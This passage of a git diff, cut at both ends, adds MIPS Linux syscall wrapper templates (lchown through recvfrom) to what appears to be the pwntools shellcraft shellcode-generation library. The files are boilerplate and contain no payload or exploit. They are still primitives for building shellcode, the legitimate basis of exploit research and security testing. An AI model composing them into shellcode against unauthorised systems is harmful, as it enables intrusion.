+<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/mips/linux/link.asm b/pwnlib/shellcraft/templates/mips/linux/link.asm new file mode 100644 index 000000000..11e19ca6c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/mips/linux/linkat.asm b/pwnlib/shellcraft/templates/mips/linux/linkat.asm new file mode 100644 index 000000000..c4ba610de --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/listen.asm b/pwnlib/shellcraft/templates/mips/linux/listen.asm new file mode 100644 index 000000000..f6428fdad --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/mips/linux/lseek.asm b/pwnlib/shellcraft/templates/mips/linux/lseek.asm new file mode 100644 index 000000000..baef8660f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/mips/linux/lstat.asm b/pwnlib/shellcraft/templates/mips/linux/lstat.asm new file mode 100644 index 000000000..85927cf97 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/lstat64.asm b/pwnlib/shellcraft/templates/mips/linux/lstat64.asm new file mode 100644 index 000000000..0e7edb6a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/madvise.asm b/pwnlib/shellcraft/templates/mips/linux/madvise.asm new file mode 100644 index 000000000..fad41fbf3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mincore.asm b/pwnlib/shellcraft/templates/mips/linux/mincore.asm new file mode 100644 index 000000000..acca576cd --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mkdir.asm b/pwnlib/shellcraft/templates/mips/linux/mkdir.asm new file mode 100644 index 000000000..fd2f17617 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mkdirat.asm b/pwnlib/shellcraft/templates/mips/linux/mkdirat.asm new file mode 100644 index 000000000..d6379a57e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mknod.asm b/pwnlib/shellcraft/templates/mips/linux/mknod.asm new file mode 100644 index 000000000..09ee3cb28 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mknodat.asm b/pwnlib/shellcraft/templates/mips/linux/mknodat.asm new file mode 100644 index 000000000..05d8b9c73 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mlock.asm b/pwnlib/shellcraft/templates/mips/linux/mlock.asm new file mode 100644 index 000000000..f8d932814 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mlockall.asm b/pwnlib/shellcraft/templates/mips/linux/mlockall.asm new file mode 100644 index 000000000..7d93befd1 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mmap.asm b/pwnlib/shellcraft/templates/mips/linux/mmap.asm new file mode 100644 index 000000000..43fb3a007 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mmap.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mprotect.asm b/pwnlib/shellcraft/templates/mips/linux/mprotect.asm new file mode 100644 index 000000000..d05914836 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_notify.asm b/pwnlib/shellcraft/templates/mips/linux/mq_notify.asm new file mode 100644 index 000000000..646bf1afc --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_open.asm b/pwnlib/shellcraft/templates/mips/linux/mq_open.asm new file mode 100644 index 000000000..328b795b7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm new file mode 100644 index 000000000..33932b012 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm new file mode 100644 index 000000000..d65bd51f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm new file mode 100644 index 000000000..eefba26bf --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mremap.asm b/pwnlib/shellcraft/templates/mips/linux/mremap.asm new file mode 100644 index 000000000..169a1e3e3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/msync.asm b/pwnlib/shellcraft/templates/mips/linux/msync.asm new file mode 100644 index 000000000..a6ea9181d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/munlock.asm b/pwnlib/shellcraft/templates/mips/linux/munlock.asm new file mode 100644 index 000000000..f0ac268be --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/munlockall.asm b/pwnlib/shellcraft/templates/mips/linux/munlockall.asm new file mode 100644 index 000000000..5cc86c624 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/mips/linux/munmap.asm b/pwnlib/shellcraft/templates/mips/linux/munmap.asm new file mode 100644 index 000000000..e768182c0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/nanosleep.asm b/pwnlib/shellcraft/templates/mips/linux/nanosleep.asm new file mode 100644 index 000000000..8f9a8d6b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/mips/linux/nice.asm b/pwnlib/shellcraft/templates/mips/linux/nice.asm new file mode 100644 index 000000000..2ad59d64a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/mips/linux/open.asm b/pwnlib/shellcraft/templates/mips/linux/open.asm new file mode 100644 index 000000000..9cfbcb99d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/openat.asm b/pwnlib/shellcraft/templates/mips/linux/openat.asm new file mode 100644 index 000000000..31cdd8c67 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pause.asm b/pwnlib/shellcraft/templates/mips/linux/pause.asm new file mode 100644 index 000000000..ac312b6a6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/mips/linux/pipe.asm b/pwnlib/shellcraft/templates/mips/linux/pipe.asm new file mode 100644 index 000000000..dc4bc15c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pipe2.asm b/pwnlib/shellcraft/templates/mips/linux/pipe2.asm new file mode 100644 index 000000000..a5af25dd5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/poll.asm b/pwnlib/shellcraft/templates/mips/linux/poll.asm new file mode 100644 index 000000000..ff7197810 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ppoll.asm b/pwnlib/shellcraft/templates/mips/linux/ppoll.asm new file mode 100644 index 000000000..f5b8cdaa6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/mips/linux/prctl.asm b/pwnlib/shellcraft/templates/mips/linux/prctl.asm new file mode 100644 index 000000000..b4048c641 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="option, vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pread.asm b/pwnlib/shellcraft/templates/mips/linux/pread.asm new file mode 100644 index 000000000..3396fffe3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/preadv.asm b/pwnlib/shellcraft/templates/mips/linux/preadv.asm new file mode 100644 index 000000000..75dbcaf3a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/prlimit64.asm b/pwnlib/shellcraft/templates/mips/linux/prlimit64.asm new file mode 100644 index 000000000..d2534651a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/mips/linux/profil.asm b/pwnlib/shellcraft/templates/mips/linux/profil.asm new file mode 100644 index 000000000..7878c43d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ptrace.asm b/pwnlib/shellcraft/templates/mips/linux/ptrace.asm new file mode 100644 index 000000000..90c614c11 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/putpmsg.asm b/pwnlib/shellcraft/templates/mips/linux/putpmsg.asm new file mode 100644 index 000000000..8a8d3304b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pwrite.asm b/pwnlib/shellcraft/templates/mips/linux/pwrite.asm new file mode 100644 index 000000000..afc9d9aa8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pwritev.asm b/pwnlib/shellcraft/templates/mips/linux/pwritev.asm new file mode 100644 index 000000000..66c9abb0e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/read.asm b/pwnlib/shellcraft/templates/mips/linux/read.asm index fd5805e9f..bc0fa9618 100644 --- a/pwnlib/shellcraft/templates/mips/linux/read.asm +++ b/pwnlib/shellcraft/templates/mips/linux/read.asm @@ -1,6 +1,6 @@ <% -from pwnlib.shellcraft.mips.linux import syscall + from pwnlib.shellcraft.mips.linux import syscall %> <%page args="fd, buf, nbytes"/> <%docstring> diff --git a/pwnlib/shellcraft/templates/mips/linux/readahead.asm b/pwnlib/shellcraft/templates/mips/linux/readahead.asm new file mode 100644 index 000000000..f6a23eb3f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readdir.asm b/pwnlib/shellcraft/templates/mips/linux/readdir.asm new file mode 100644 index 000000000..be347b188 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readlink.asm b/pwnlib/shellcraft/templates/mips/linux/readlink.asm new file mode 100644 index 000000000..2e4c3b1ba --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readlinkat.asm b/pwnlib/shellcraft/templates/mips/linux/readlinkat.asm new file mode 100644 index 000000000..38f2bcccb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readv.asm b/pwnlib/shellcraft/templates/mips/linux/readv.asm new file mode 100644 index 000000000..d1571ae97 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recv.asm b/pwnlib/shellcraft/templates/mips/linux/recv.asm new file mode 100644 index 000000000..d8c6ed2bb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recvfrom.asm b/pwnlib/shellcraft/templates/mips/linux/recvfrom.asm new file mode 100644 index 000000000..7a737cf91 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git 